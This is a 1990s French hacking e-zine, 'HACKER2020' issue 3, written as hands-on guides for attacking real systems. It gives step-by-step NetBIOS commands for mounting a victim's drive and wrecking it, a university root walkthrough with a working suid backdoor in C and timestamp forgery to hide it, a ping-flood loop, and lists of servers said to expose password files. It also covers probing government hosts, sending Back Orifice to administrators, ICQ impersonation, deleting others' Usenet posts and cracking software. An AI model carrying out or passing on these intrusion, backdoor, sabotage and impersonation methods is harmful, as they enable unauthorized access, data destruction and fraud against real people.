HACKER2020
ISSUE N°3
<Disclaimer>
1- Sites aux ftp non protégés
2- textes intéressants d'autres E-mags
3- Les coups de pouces
4- Piratage de site 2
5- Cours de crack 1 par Frog's Print.
 
=== Disclaimer ===

   Toutes les informations contenues dans ce fanzine n'y sont qu'à titre purement informatif! Il vous est déconseillé de les appliquer, sous risques d'amendes et de poursuites judiciaires. Moi ou mon serveur (actuellement Multimania), ne seraient être tenus responsables de ce que vous ferez de ces informations!
 

<<< 1- Sites aux ftp non protégés >>>
   Après avoir moi-même accédé aux ftp d'un site non protégé par le navigateur, et avoir recueuilli quelques infos, j'ai trouvé ce texte qui donnait une série de sites, dont les ftp par navigateur n'étaient pas protégé. donc accès au répertoire etc/passwd/ possible... J'ai donc jugé intéressant de les mettre à votre disposition! sachez quand même que certains de ces url ne marchent peut-être plus... je ne les ait pas tous vérifié, donc...
 
 
Lieu ou se situe le site Adresse
Cambridge, MA 
Eastern  USA
ftp.crl.research.digital.com
Cambridge, MA 
Eastern USA
ftp.x.org
New York city 
Eastern USA
ftp.duke.edu
Washington, DC 
Eastern USA
ftp.digex.net
Minneapolis, MN 
Central USA
ftp.cs.umn.edu
West Lafayette, IN 
central USA
ftp.cs.purdue.edu
Palo Alto, California 
Western USA
ftp.digital.com
Albuquerque, NM 
Southwest USA
ftp.khoros.unm.edu
British Columbia 
Canada
ftp.cs.ubc.ca
Czech Republic (République Tchèque) ftp.eunet.cz
England ftp.sunsite.doc.ic.ac.uk
Europe ftp.eu.net
Finland ftp.eunet.fi
Finland ftp.funet.fi
France ftp.univ-lillel.fr
Germany ftp.gwdg.de
Germany ftp.rz.uni-wuerzburg.de
Germany ftp.uni-paderborn.de
Greece ftp.ntua.gr
Iceland ftp.isnet.is
Ireland ftp.ieunet.ie
Norway ftp.unit.no
Poland ftp.sunsite.icm.edu.pl
Portugal ftp.puug.pt
Spain ftp.asterix.fi.upm.es
Sweden ftp.sunet.se
Switzerland ftp.switch.ch
United Kingdom ftp.mcc.ac.uk
Hong Kong ftp.cs.cuhk.edu.hk
Japan ftp.sunsite.sut.ac.jp
South Africa ftp.is.co.za
Israel ftp.huji.ac.il
 
Vous n'avez plus qu'à aller dans etc/passwd et comprendre un peu UNIX, parce que sinon vous comprendrez pas les infos qui vous sont données à l'écran!!!
 
<<< 2- textes intéressants d'autres E-mags >>>

Voici deux techniques qui vont vous permettre de prendre le contrôle
d'un disque dur (une troisième technique est en préparation...). La première
technique, pour l'utiliser vous devez avoir NETBIOS et votre victime doit avoir
Windows 95 ou Windows NT. La deuxième technique est beaucoup plus simple...
mais vous devez convaincre votre victime d'accepter votre fichier pour ensuite vous
connecter sur le port 666 avec Ws_ftp (plus de détail plus bas...)

1) Première technique avec NETBIOS
==================================

LE PRINCIPE :

Depuis que NT 3.51 existe, Microsoft a implementé des commandes permettant de
communiquer avec d'autres PC, tout ca juste avec un driver pour votre carte
réseau, le protocole NETBEUI d'installé, et le tout en ligne de commande, ce
qui permettait de réaliser des installations … distance par exemple. C'est
d'ailleurs encore beaucoup utilisé, une simple disquette de boot, et paf, vous
pouvez installer plein de postes. Ce protocole NETBEUI, reposant sur NETBIOS,
vous permet entre autres de partager des ressources sur le réseau, … condition
d'avoir install‚ le client "Client pour le r‚seaux Microsoft", et d'avoir
activé l'option "Permettre … d'autres utilisateurs d'utiliser mes fichiers".
Dans ce cas, vous pourrez alors voir ce qui est partagé dans le fameux
Voisinage réseau de Partageur 95 ou de NT 4. Certains d'entre vous sont en
train de lire ceci, se dise : "Arfff le con, il sait même pas que Internet ça
repose sur les protocoles TCP/IP et pas NETBEUI". Et là, je vous réponds :
"Je sais mon enfant, mais il existe une passerelle !!". "Une passerelle ?
Entre NETBEUI et TCP/IP ?? Je le crois pas ? C'est pas possible ???" me
répondrez vous !! Et pourtant si !! Microsoft ne pouvait pas se permettre
d'interdire ce type de passerelle, car tous les réseaux Internet utilisent
TCP/IP, et il fallait un moyen de convertir les noms de machines sous NETBEUI
en adresse IP. C'est ce que fait le fichier LMHOST dans votre répertoire
WINDOWS. Logiquement, si vous regardez maintenant, il n'existe pas, mais en
revanche vous devez avoir un LMHOSTS.SAM qui traîne, qui est un fichier
d'exemple. Allez donc y jeter un coup d'oeil...

Donc vous avez compris, avec LMHOST, on peut donc aller voir les ressources
partagées de quelqu'un, à partir du moment qu'on connait son IP, le nom de sa
machine et ses ressources partagées. Et il faut aussi qu'il ait des ressources
partagées évidemment, mais ça faut pas être polytechnicien pour le comprendre.
Vu comme ça, ça fait beaucoup de choses à savoir, mais pas tant que ça en fin
de compte, pour avoir ces renseignements, voici comment faire...

Première chose, pogner l'IP. Là, rien de plus facile, vous repèrez l'IP ou
l'adresse du gars sur IRC par exemple. Si c'est l'IP numérique du type
123.123.123.123, pas de problème, si c'est un truc du genre
marcel@routeur.domaine.com, vous faites: PING -a routeur.domaine.com et vous
aurez son IP. Voilà une bonne chose de faite. Maintenant, ça serait sympa de
savoir le nom d'ordinateur de la personne dont vous voulez voir le disque dur.
Pour cela, Bill nous offre la fonction NBTSTAT qui permet de voir l'‚tat d'un
adapteur réseau, et les infos le concernant.

Tapez donc (Dans Ms-Dos, ouvrez donc une fenêtre dos...) :
NBTSTAT -A 127.127.127.127 <- L'adresse IP de la cible hein , pas celle ci...

Ah oui, le -A signifie que c'est une adresse IP numérique que l'on donne.
N'OUBLIEZ PAS LA MAJUSCULE)

Si la cible a NETBEUI d'installé, vous devriez obtenir un truc du style :
 

C:\>NBTSTAT -A 194.114.95.141

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
MAURO <00> UNIQUE Registered
MICA <00> GROUP Registered
MAURO <03> UNIQUE Registered
MAURO <20> UNIQUE Registered
MICA <1E> GROUP Registered

MAC Address = 44-45-53-54-00-00

(SI C'EST ECRIT "HOST NOT FOUND", C'EST QUE VOUS DEVEZ
CHANGER DE CIBLE...CAR ELLE N'A PAS NETBEUI D'INSTALLE.)

Ce qui vous intéresse c'est les noms avec écrit UNIQUE à côté. Votre cible
utilise forcément l'un de ces noms de machines en ce moment même !! Et c'est
là qu'intervient LMHOSTS.

Vous éditez LMHOSTS avec EDIT (dans une fenêtre Ms-Dos, tapez "edit") par
exemple, et vous tapez dans ce fichier :

194.114.95.141 MAURO #PRE

Donc, l'IP, suivi du nom de machine, suivi de #PRE, pour indiquer que cette
correspondance entre l'IP et le nom de machine doit être préchargé, pour ainsi
passer AVANT la résolution DNS. (Si vous ne voulez pas vous fatiguer à editer,

tapez donc "echo 194.114.95.141 MAURO>> c:\windows\lmhosts", ca revient à la
même chose...)

Ensuite, on va réinitialiser notre fichier LMHOSTS que vous venez juste de
sauvegarder, n'est ce pas ? Pour cela, vous tapez :

C:\>NBTSTAT -R

Et si tout se passe bien, vous obtenez :

"Successful purge and preload of the NBT Remote Cache Name Table."

Maintenant, nous allons nous occuper de chercher les ressources partagées par
notre copain.

Pour voir les ressources, vous allez taper NET VIEW, VIEW comme "voir" en
anglais, remarquez comme les choses sont bien faites. D'ailleurs cette
commande NET est extrêmement puissante, faites donc un NET /? Pour vous en
convaincre !! Donc, ça doit donner un truc comme :

NET VIEW \\MAURO (MAURO car là… nous passons sur le protocole
NETBEUI,
LMHOSTS va se charger de convertir le nom de machine en IP)

Et hop, dans mon exemple, ça donne ça :
 

C:\>NET VIEW \\MAURO

Ressources partagées … \\MAURO

Nom de partage Type Commentaire

---------------------------------------------------

C Disque

D Disque

E Disque

HP4L Impr.

G Disque

I Disque

Exécution achevée.

Je sais donc que tous ces lecteurs sont partagés. Parfait, on va donc aller
faire un tour sur le C: .

La commande NET arrive à ma rescousse :

C:\>NET USE \\MAURO\C

K: Connect‚ … \\MAURO\C

Et voilà…, le disque C de la cible est devenu mon disque K: Super non ? Vous
pouvez alors tout visiter et foutre le bordel (ca, c'est tellement dégueux que c'est à
faire qu'aux pédophiles, antisémites, fascistes, ...).

Si vous avez un problème pour la commande NET, utilisez donc ce moyen bien
plus simple et facile d'utilisation :

- clic sur "Démarrer" , "rechercher" , "Ordinateur" et tapez le nom de l'ordi distant
(ici : "MAURO" )
 
 

- une fois l'icône trouvé, double-clic dessus , et voilà la fenêtre de SON poste de
travail qui s'ouvre... Bon Fun ! : ^ )

- Comment hacker sa fac en quelques leçons (Octagon):

Cet article s'adresse aux debutants sous unix qui ont pas envie de se prendre
la tete a maitriser et qui ont besoin d'avoir acces au compte de leurs profs
par exemple (mais pour quoi faire au juste ?)...

Materiel necessaire.... NoRoute #1..
                        Un account sur une becanne unix de la fac..
                        Une legere connaissance de unix..
                        Une conscience..

Sous unix le seul account interessant est l'acces root. Nous sommes bien
d'accord, root est le compte qui vous permet de tout faire sur un systeme.
Son user_id est 0 est son group_id est le meme..

Commencez tout d'abord par reconnaitre le systeme utilise par la machine,
chaque systeme a ses holes et ses problemes... Pour cela, faites appel a
"uname -a" qui vous donnera une reponse franche :

SunOS 4.1.4 par exemple.. Vous avez desormais acces a un systeme bourre de
bugs potentiellement exploitables... La grande mode en matiere de hack, et
la grande technique utilisee par tous de nos jours car elle est simple et
efficace et ne demande pas une grande connaissance du systeme est l'exploit.
L'exploit est un petit programme ou une serie de commande trouvee par un
ingenieux bonhomme qui permet souvent de chopper l'acces root sur un systeme.
Obtenir des exploits n'est pas tres complique... Un petit ftpsearch sur
exploit vous donnera au moins un ftp bourre d'exploits pour differents systemes
que vous n'aurez plus qu'a utiliser pour chopper le root..
Un exploit celebre est celui de la commande umount sous BSD. Si cette commande
possede le bit suid c'est a dire si "ls -l /bin/umount" vous donne un truk
comme:

-rwsr-xr-x (presence du 's' vous l'avez vu ?)

et que la version de umount est assez ancienne, alors vous pouvez chopper un
root sur le systeme. Vous choppez l'exploit sur votre chti ftp, que nous
appelerons ici mount.c

Vous le compilez donc:

host:~> cc mount.c -o exploit
host:~> exploit
Discovered and Coded by Bloodmask and Vio, Covin 1996
bash# whoami
root
bash#

Et vous etes root. La simplicite de la chose explique pourquoi de nos jours
il y a tellement de jeunes abrutis qui annoncent fierement leurs root dans
#hack... =) Cet exploit utilise en fait une architecture de code propre aux
mauvais programmes  qui permet de modifier l'adresse de retour d'un call.
En effet, le programme umount devient root pendant son execution grace
au bit suid. En l'executant et en forcant le retour d'un call vers une routine
qui execute un shell, on obtient ainsi un shell root...(voir exploits... =)
C'est un exemple parmi tant d'autres.. Disons franchement qu'en cherchant bien
sur le net et en essayant betement tous les exploits propres a un systeme, meme
si vous etes une grosse brelle en matiere d'unix, vous arriverez a chopper le
root dans votre fac huh... Bien entendu les administrateurs systemes des facs
sont au courant de ces exploits et fixent en permanence leur systeme contre
ceux-ci (du moins dans ma fac, ou j'ai eu un mal fou a chopper le root arf)..
Une fois que vous etes root, vous ne pouvez bien entendu pas vous permettre d'
utiliser l'exploit en question a chaque fois que vous desirez passer root
sur le syteme, pour la simple raison que ce hole ne restera pas longtemps en
place...
Il vous faut donc planquer quelquepart un chti programme qui vous donnera
l'acces root tout le temps mais qui ne sera pas decouvert par le root lui-meme..
Le mieux est d'avoir acces aux sources d'un programme suid peu souvent change
par la fac que vous pourrez modifier pour vous donner un shell lorsqu'il est
appele avec certains arguments... Par exemple, integrer a login.c un test

if (!strcmp(username,"sorcery")) return (0);

qui vous permettra de vous logger en root depuis n'importe ou... Sans laisser
de traces sur le syteme. L'exemple ci-dessus ne tient absolument pas compte
du code original de login.c le but est seulement de vous faire piger le
principe... =)

Un autre moyen, utilisable dans les systemes peu surveilles, mais assez
discret quand meme, est de vous creer votre programme a vous, suid, qui vous
donnera le root... Bien entendu il faut securiser ce programme en le deguisant
en programme normal. Donnez lui un nom qui fasse "vrai" et qui justifie le
bit suid par exemple "xfixconsole" qui d'apres son nom necessite un acces a
la console et donc un root..
Placez le dans un repertoire peu frequente tel que /usr/X11R5/bin/ par exemple.
Voici un exemple de code:

----8<-----8<-------8<--------8<-------cut here-------8<------8<-------

/* Xfixconsole by Sorcery
   Sacre joli nom huh...
   Ne donne le shell que si il est appele ansi:
   host:~> xfixconsole fixing                 */

void main(int argc, char *argv[]) {
 
 if ( (argv[1]) && (!strcmp(argv[0],"xfixconsole"))\
             && (!strcmp(argv[1],"fixing")) ) {
 
      setuid(0);
      setgid(0);
      system("/bin/bash");
 
  } else {

      printf("\nFixed 0xA000\n");
 
  }

 }
 
----8<-----8<--------8<--------8<----------cut here---------8<--------
 
Ensuite, compilez le programme et placez le dans le repertoire voulu...

bash# cc xfixconsole.c -o xfixconsole

Avant de le deplacer, nous allons noter la date de derniere modif du rep
/usr/X11R5/bin... ("ls -l /usr/X11R5"). Disons que nous trouvons Jan 1 1994.
 
bash# mv xfixconsole /usr/X11R5/bin/
 
Il faut maintenant lui donner les permissions voulues (+s) pour qu'il puisse
changer son uid et son gid a 0...

bash# chmod +s /usr/X11R5/bin/xfixconsole
bash# ls -al !$
ls -al /usr/X11R5/bin/xfixconsole
-rwsr-xr-x   1 root     wheel         38613 Jan  1  1997 .../bin/xfixconsole*
bash#
 
voila qui est mieux. Maintenant il faut cacher ce fichier: il y a trois choses
a modifier pour que le fichier passe discretement:

-la date du fichier
-son proprietaire
-la date du '.' (eh oui, la date du rep a change aussi)

Pour cela, nous mettons le fichier a la meme date que les fichiers qui lui
sont proches: (cela passe bien lorsqu'une serie de cinq fichiers sont cotes
a cotes et ont la meme date...)

bash# ls -l /usr/X11R5/bin/xf*
-r-xr-xr-x   1 root     bin        385636 Jul 28  1995 /usr/X11R5/bin/xfig*
-rwxr-xr-x   1 root     bin        148600 Jun 24  1995 /usr/X11R5/bin/xfile..
                                                                    ..manager*
-rwsr-xr-x   1 root     wheel       38613 Jan  1  1997 /usr/X11R5/bin/xfix..
                                                                    ..console*
-rwxr-xr-x   1 root     bin        117344 Jun 18  1995 /usr/X11R5/bin/xfm*
-rwxr-xr-x   1 root     bin           770 Jun 18  1995 /usr/X11R5/bin/xfm.ins..
                                                                    ..tall*
-rwxr-xr-x   1 root     bin         14184 Jun 18  1995 /usr/X11R5/bin/xfmtype*
bash#
bash# touch -t 180614591995 /usr/X11R5/bin/xfixconsole
bash# touch -t 010114591994 /usr/X11R5/bin
bash# chgrp bin /usr/X11R5/bin/xfixconsole
bash# ls -l /usr/X11R5/bin/xfixconsole
-rws--x--x   1 root     bin         38613 Jun 18  1995 /usr/X11R5/bin/xfix..
                                                                    ..console*

Vous avez desormais un chti root sympa sur le systeme, qui vous permettra de
bien vous marrer.
A verifier cependant avant d'installer un tel prog: les crontabs. Dans
/usr/spool/cron/crontabs/root, vous trouverez une liste d'instructions
executees automatiquement par le systeme pour le root. Verifiez bien qu'aucun
script n'est lance qui detecterait par exemple les nouveaux suid installes
sur le systeme (utilisant generalement la commande find) ou autre chose
qui vous grillerait...
Choppez maintenant le fichier shadow, ou son equivalent selon les systemes..
(passwd.orig, passwd.secure, /auth/*/*...).. et crackez vous deux ou trois
accounts a l'aide d'un cracker trouve sur le net (guess, par exemple, ou
crack etc..). Cela vous permettra de ne plus vous logger avec votre compte
pour bidouiller le systeme, ce qui peut etre assez pratique parfois...
Passons maintenant a une aventure qui m'est arrivee dans ma fac et qui
pourrait bien vous arriver si votre fac utilise plusieurs parcs de systemes
differents...
J'avais le root sur le parc HPUX, et besoin du root sur les SunOS de ma
fac. Mon home etait le meme sur les deux, car le meme disk etait partage
par NFS entre les becannes. Le disque etait en local sur HPUX et en NFS
sur les SUNS. Le but etait donc d'exploiter le root de HPUX pour ne pas
avoir a essayer des dizaines d'exploits sur la sun dont le sunos etait
plutot bien protege... Voici donc la methode utilisee:

sun:~> indique que les commandes sont tapees sur la sun.
hp:~> indique que ma mere m'appelle pour diner ahum.
 
sun:~> cc xfixconsole.c -o root
 
j'avais donc dans mon home, le fichier xfixconsole.c compile pour sunos, bien
entendu non executable sur la hp...

hp:~> cd /usr/X11R5/bin

Car '/usr/X11R5/bin/xfixconsole fixing' ne marchera pas.. =)

hp:/usr/X11R5/bin/> xfixconsole fixing
bash_hp# cd
bash_hp# chown root.wheel ./root
bash_hp# chmod 755 ./root
bash_hp# ls -al ./root
-rwsr-sr-x (.../...) root
bash_hp#

sun:~> ./root
bash_sun# whoami
root
bash_sun#

En utilisant mon home comme passerelle, j'ai donc reussi a executer sur la
sun un suid via nfs... Il faut savoir que cela ne marchera que si:

1) Le root obtenu est sur la machine ou le home est local: via nfs, le root
   n'a pas le droit de modifier des fichiers qui ne lui appartiennent pas,
   et en particulier les rendre suid arf.. (sauf en "insecure"...)
2) Le filesystem est mounte via NFS sans le flag "nosuid" : pour verifier,
   faites un df ., qui vous donnera les flags separes par des virgules en
   plus de la place disk... (rw,nosuid...)

La meme manip est donc utilisee sur la sun... Pour utiliser touch sous sunos,
il faut passer par /usr/5bin qui contient les binaires repondant aux normes
SVR4 (system 5 release 4), car le /usr/bin de sunos contient un touch qui ne
permet pas de specifier une nouvelle date...

A la fin donc, si j'ai bien tout calcule, on se retrouve avec un controle
total de la fac qui peut etre assez plaisant =)...

[MAiS QUE FAiRE AVEC CE r00t ?]

Bonne question...
Plusieurs activites sont marrantes a faire avec un root. Il y a tout d'abord
le flood, qui, si vous avez le root sur un reseau a grande bande passante,
vous permet de faire couler pas mal de connections 14.4 sur le net...
Pour cela, plusieurs utilitaires existent sous linux par exemple, a peu pres
tous bases sur le syn flood qui a tendance a plus trop marcher. Le ping est
encore assez efficace: ping -f host en particulier si vous avez la bonne
version de ping....est assez mechant quand il est utilise avec des '&' par
exemple  while (1)
 while> ping -f host &
 while> end
est assez marrant.... pour arreter le massacre, killer le while puis faire un
killall ping... ICMP rulez! =)
On peut egalement sniffer avec un root...si le systeme est un noeud important
pour d'autres becannes, ou si il est beaucoup frequente, il est possible de
chopper, en ecoutant les connections reseaux, plusieurs acces un peu partout
et pourquoi pas d'autres rewts.. =)
Enfin, le but du rewt est surtout de l'avoir, ensuite imaginez vous tout
simplement aux commandes d'un systeme en 64Mbits sur le net et vos idees
viendront vite... =)
 
                                                               -SorcerY
                                                                  Grmbl..
 
Placons ici quelques greetings =)
Le truk chiant dont personne a rien a foutre sauf
Octagon

 
 
 
<<< Les coups de pouces >>>
- Les sites gouvernementaux:
Le site de la CIA: http://www.cia.gov/cia. et pour toutes les personnes qui essaieraint de pirater leur beau site sachez qu'il est bien marqué à l'entrée:
     You are entering an Official United States Government System, which may be
     used only for authorized purposes. Unauthorized modification of any
     information stored on this system may result in criminal prosecution. The
     Government may monitor and audit the usage of this system, and all persons
     are hereby notified that use of this system constitutes consent to such
     monitoring and auditing.
Essayer serait jouer avec le feu!

Le site du FBI: http://www.fbi.gov: aucun accès ftp en anonyme possible! Accès telnet possible (nous verrons ce cas de figure après)

Le site de la NASA: http://www.nasa.gov: aucun accès en ftp possible.

- Accès telnet aux comptes telnet d'un site:

   En tant normal, nombreux sont les sites importants qui ont un compte telnet... Comment vérifier rapidement si tel est le cas!!!
Bon! La méthode la plus simple consiste à faire sous navigateur: telnet://www.url.com ou .gov etc...
Mais il y a de nombreuses chances qu'il y ait un time out qui vous fasse perdre la connexion assez rapidement comme c'est le cas du FBI si on essaie: telnet://www.fbi.gov
Cela donne:

   Ceci est un cas échéant (le site fait de l'IP filtering), donc il est tout à fait possible qu'une connexion soit maintenue!
Pour essayer de maintenir la connection on va utiliser une méthode moins rapide, se connecter sur l'IP du site (Cela ne marche que rarement). Vous allez sous DOS vous faites (les ">" ne devant pas être écrits):
> tracert www.fbi. gov
ENTREE
Et l'IP du site du FBI est le 32.97.253.60. Vous ouvrez telnet à partir de votr pc et vous essayez de vous connecter au compte du FBI. Dans le cas échéant vous vous retrouverez avec une connexion d'hôte perdue... Laissez donc tomber l'idée d'accéder aux comptes du FBI, puis essayez d'accéder à leur rooter par telnet: 165.87.34.184, ou encore à leurs ftp sous DOS en faisant (les ">" ne devant pas être écrits):
> ftp
> open
> www.fbi.gov
ENTREE
Et utilisez un passcrack pour DOS.
Si vous essayez telnet://www.cia.gov ou nasa.gov, vous verrez qu'il n'y a aucun compte à l'autre bout! En fait c'est qu'il n'y a aucun compte du nom de www.cia.gov ou de nasa.gov.
Donc il faut prendre l'IP du site! si il a un compte vous tomberez dessus.
Vous tracez donc les deux et vous avez comme adresse IP de la CIA: 198.81.129.99, et celui de la NASA est le 198.116.116.10.
Donc vous essayez d'écceder à cet comptes telnet par l'I, mais je vous le dis, celà menne à un échec. Vous laissez donc tomber l'idée d'accéder aux comptes telnet de la CIA et du FBI, car il y a d'autres sites où ça marche très bien, telnet://www.hacker.com par exemple.

- Effacer les messages dans les groupes de news (avec Netscape Navigator version 4.03):

   Aller sur un groupe de news, séléctionner un message puis faire (les ">" ne sont pas à faire):
> edition
> préférences
> identité; puis mettre le nick et l'E-mail (tout doir être exact) de la cible, puis faire OK.
Annuler le message avec "suppr".
 
Prendre un nick sous icq:

   En fait c'est une technique bête comme chou, mais à laquelle il fallait panser! Inutile d'avoir des icq cracker ni autre chose, juste icq. Bon, la technique est simple à réaliser. sachez quand même que seul l'UIN diffèrera de celle de votre victime. Mais pour se faire passer pour quelqu'un c'est l'idéal.
Ouvrez icq et faites (les ">" ne doivent pas être écrits):
> ICQ
> Add/Change Current User
> Register a New User(ICQ#)
Prenes toutes les infos de votre victime dans la rubrique infos, créez un nouvel User à son nick et à ses infos, puis pour alterner faites:
>  Change the Active User
Si vous avez plus de 5 ou 6 users vous ne pourrez en créer plus.

Rajouter des numéros à votre compteur:

   Là aussi c'est un truc bête comme chou: allez dans le fichier source de votre page, recherchez le compteur et recherchez le numéro actuellement inscrit! Z'avez plus qu'à changer le N° de personnes entrées sur votre site, sauvez et faites passez en ftp!

Faire sauter un pass en général sur une page HTML:

   Certains le savent d'autres non, il vous suffit de regarder le fichier surce et de regarder ou se trouve le pass:
Par exemple sur ce code source du site: http://www.jacksgame.com:

function passMe() {
        var Goop = document.Qbert.PWORD.value
        document.Qbert.PWORD.value = Goop.toUpperCase()
        if (document.Qbert.PWORD.value == "WATERS") {
                location.href="../desktop/index.html"
        }
        if (document.Qbert.PWORD.value != "WATERS") {
                alert("Close but no cigar!");

Voilà... Autre type de solution, (si il vous est possible de la faire) vous regardez vers quel lien mène le bouton de validation, et vous n'avez plus qu'à entrer ce lien, à la suite de l'url base.

Accès aux indexs des sites ou serveurs:

   Prenons un serveur inintéressant au possible mais qui fera un bon exemple. Nous allons prendre le serveur: http://www.hacker.com
Vous vous connectez sur ce site, qui ne parle en rien de hack... (en fait si mais il est désormais impossible de me vérifier). Donc vous allez regarder le code source de la page; celà vous donne:

<html>

<head>
<title>
H A C K E R . C O M
</title>
</head>

<body bgcolor=ffffff background=./images/greenback.gif>
 

<center>
<tr>
<img src="./images/hackertop.gif"><br>

<table>
<tr>
<td>
<a href="resources.html"><img src="./images/1.gif" border=0></a><br>
<a href="proshops.html"><img src="./images/2.gif" border=0></a><br>
<a href="equipment.html"><img src="./images/3.gif" border=0></a><br>
<a href="course.html"><img src="./images/4.gif" border="0"></a><br>
</td>

On va s'arrêter là. Inutile d'inscrire la suite.... En fait il n'y a que ce qui est en rouge qui est intéressant.
Ici on a le "lieu" où sont stockées les images. C'est dans le répertoire /images. Donc on tape l'url: http://www.hacker.com/images et on rentre sur l'index d'images. Et voilà. Vous êtes sur l'index des images et donc vous pouvez voir TOUTES les images à voir sur le site et qui sont passées en ftp. Vous pouvez essayez sur d'autres sites avec d'autres répertoires comme /files ou d'autres noms. Essayez aussi: http://www.scoregames.com/Images
Pour protéger un index il faut créer un répertoire index.htm.

Passer une protection par un lien:

   Une certaine option permet de passer les pass sur certains sites. Plus en détail avec quelques exemples: allez sur le site: http://altern.org/hackers
Cliquez sur Files. Le password est "clanhkc". Mais ce n'est point le password qui nous intéresse. Il est en effet possible de passer cette protection sur certains sites dans le même genre! Regardez le source, en effet il est important d'avoir les informations exactes, mais regardez le source du cadre en ayant le doigt posé sur le lien, sinon ça ne donnera rien:

<A HREF="#" OnClick="cadre('main.html','bottom.html');" onmouseover="color('menu1','menu1a'); self.status='HKC - MAIN';return true" onmouseout="color('menu1','menu1'); self.status='HKC';return true"><IMG SRC="menu1.gif" BORDER=0 WIDTH=94 NAME='menu1'></A><BR>
<A HREF="#" OnClick="cadre('http://www.messagezone.com/message.asp?BoardName=103905','bot_join.html');" onmouseover="color('menu2','menu2a'); self.status='HKC - JOIN';return true" onmouseout="color('menu2','menu2'); self.status='HKC';return true"><IMG SRC="menu2.gif" BORDER=0 WIDTH=94 NAME='menu2'></A><BR>
<A HREF="#" OnClick="password('prot_mem.html','bot_mem.html');" onmouseover="color('menu3','menu3a'); self.status='HKC - MEMBERS';return true" onmouseout="color('menu3','menu3'); self.status='HKC';return true"><IMG SRC="menu3.gif" BORDER=0 WIDTH=94 NAME='menu3'></A><BR>
<A HREF="#" OnClick="password('prot_files.html','bot_files.html');" onmouseover="color('menu4','menu4a'); self.status='HKC - FILES';return true" onmouseout="color('menu4','menu4'); self.status='HKC';return true"><IMG SRC="menu4.gif" BORDER=0 WIDTH=94 NAME='menu4'></A><BR>
<A HREF="#" OnClick="password('prot_news.html','bot_news.html');" onmouseover="color('menu5','menu5a'); self.status='HKC - NEWS';return true" onmouseout="color('menu5','menu5'); self.status='HKC';return true"><IMG SRC="menu5.gif" BORDER=0 WIDTH=94 NAME='menu5'></A><BR>
<IMG SRC="menu6.gif" BORDER=0 WIDTH=94><BR><BR>
 

   C'est ce qui est en rouge qui nous intéresse plus particulièrement. Vous n'allez pas vous faire chier avec le pass n'est-ce pas? alors vous utilisez un passage du nom de protected plus l'expension en rouge, ce qui donne pour accéder aux files sans mettre aucun password: http://altern.org/hackers/protected/prot_files.html
Vous y voilà! C'est pas beau tout ça????
 

<<< Piratage de site 2 >>>
   Piratage de site 2 mais pourquoi donc? Tout simplement parce que j'ai reçu quelques remarques qui critiquaient ma première explication, comme quoi elle n'était pas assez claire. Je vais réécrire un article en faisant de mon mieux. SACHEZ QUE WWW.URL.COM N'EST QU'UN EXEMPLE! IL N'EXISTE PAS!

   Pour commencer, vous devez avoir un minimum de connaissances de Linux ou UINX. Sinon vous pourrez toujours essayer mais celà vous paraitra moins évident.
   Il faut d'abord essayer d'obtenir le maximum d'informations sur le site à pirater: les sous-répertoires, les indexs, l'adresse IP du site, le webmaster, ne pas hésiter à le tracer sous différents tracers/pingers (Le meilleur étant WS_PINGPR), l'adresse e-mail des webmasters, vérifier si les ftp par le navigateur sont protégés (ftp://ftp.url.com), les stats aussi (http://www.url.com/stats), le tracer sous DOS pour avoir l'adresse du rooter, essayer les accès telnet etc... Celà fait beaucoup mais pett à petit, en franchissant les étapes on arrive à avoir des résultats concluants.
  D'abord vérifier l'accès telnet (telnet://www.url.com), si il existe un compte vous demandant un login et un mot de passe, vous pouvez essayer de franchir ces barrières et ce sera une bonne chose de faite. vous vérifier les failles du site et essayez de les exploiter. par exemple si l'éccès par ftp://ftp.url.com est possible, vous n'avez qu'à aller dans etc/passwd et regarder les noms des utilisateurs. Vous pourrez ensuite vous connectez dessus par ftp avec le nom d'user sous DOS, en faisant (les ">" ne devant pas être écrits):
> ftp
> open
> www.url.com

   Si les ftp par navigateur, ne sont pas accessibles utilisez WS_PINGPR et allez dans info, puis tracez le site 2 ou 3 fois si il n'y a rien de concluant. Il y a 90% de chances d'obtenir les noms des contacts du site, leurs N° de tel. et leurs adresses E-mail. Utilisez ces noms comme logins sous ftp ou telnet. Celà peut marcher. Si vous n'arrivez absolument pas à obtenir ce genres de résultats laissez tomber et rabattez-vous sur autre chose, car sinon vous ne pourrez pas faire grand chose.
   Pour la suite, une fois les logins vérifiés vous n'avez plus qu'à cracker les pass telnet, ftp sous DOS et vous pouvez vous amuser. Sinon autre solution, bien plus rapide mais plus risquée et qui a presque toutes les chances de ne pas marcher. Vous envoyez le serveur de Back Orifice à l'administateur système, et vous le tracez puis vous prenez les pass, foutez la merde etc... C'est efficace et net!!! Sinon vous pouvez toujours (mgnihihi!) essayer d'être rooter du serveur, mais comme c'est super-dur et quasiment infaisable sans mettre un peu de pognons dans des livres qui en parle, ou d'avoir l'élite pour pote...
Voilà j'espère que ça vous aura aidé!!!

<<< Cours de crack N°1 par Frog's Print >>>
 

Cours de Crack #1  - par Frog's Print - Juin 1997

--------------------------------------------------------------------------------
-SUJET   : Introduction au Cracking - 1ère Partie
           Désassembler un fichier pour le craquer
           Conseils et Documentations

-EXEMPLE : ComSpeed 2.01

-OUTILS  : W32Dasm6 (ou W32Dasm85) et une cervelle
--------------------------------------------------------------------------------
1/ INTRODUCTION
2/ EXECUTION DU CRACK
3/ CONSEILS
4/ LIVRES
--------------------------------------------------------------------------------
 
 
 

1/ INTRODUCTION

Ce premier cours, destiné avant tout aux débutants, va vous donner quelques notions sur
le cracking. Si vous ne connaissez pas grand chose à l'Assembleur, ce n'est pas bien grave
puisque je ne vais pas trop vous faire de bourrage de crâne sur ce sujet (pas encore...:=)
mais je vous conseil de vous munir d'un livre (voir section "4/LIVRES" plus bas) sur
ce langage puisqu'il vous sera quand même nécessaire de connaitre la différence entre
un "Jmp", "Jz', "Jnz" et autres "Jae".
Mais rassurez-vous, nous allons surtout utiliser la logique et notre cervelle ce qui suffira
pour craquer environ la moitié des softs de votre disque dur.

Nous allons craquer ComSpeed 2.01 (53,750 Ko) pour Win 3.X et Win95.
 
ComSpeed est disponible entre autre sur la page web de son auteur:
(http://ourworld.compuserve.com/homepages/Cordes/). A l'heure ou je rédige ce cours,
on ne trouve plus cette version mais la version 2.11.
Ce n'est pas grave le schéma de protection est EXACTEMENT le même donc dès que vous
aurez bien assimilé ce cours vous n'aurez qu'a vous faire la main sur la dernière
version.
Après tout, vous êtes ici pour apprendre pas pour piquer les cracks des autres et y
mettre votre nom, hein?

ComSpeed est un petit programme qui vous montre les performances de votre modem.

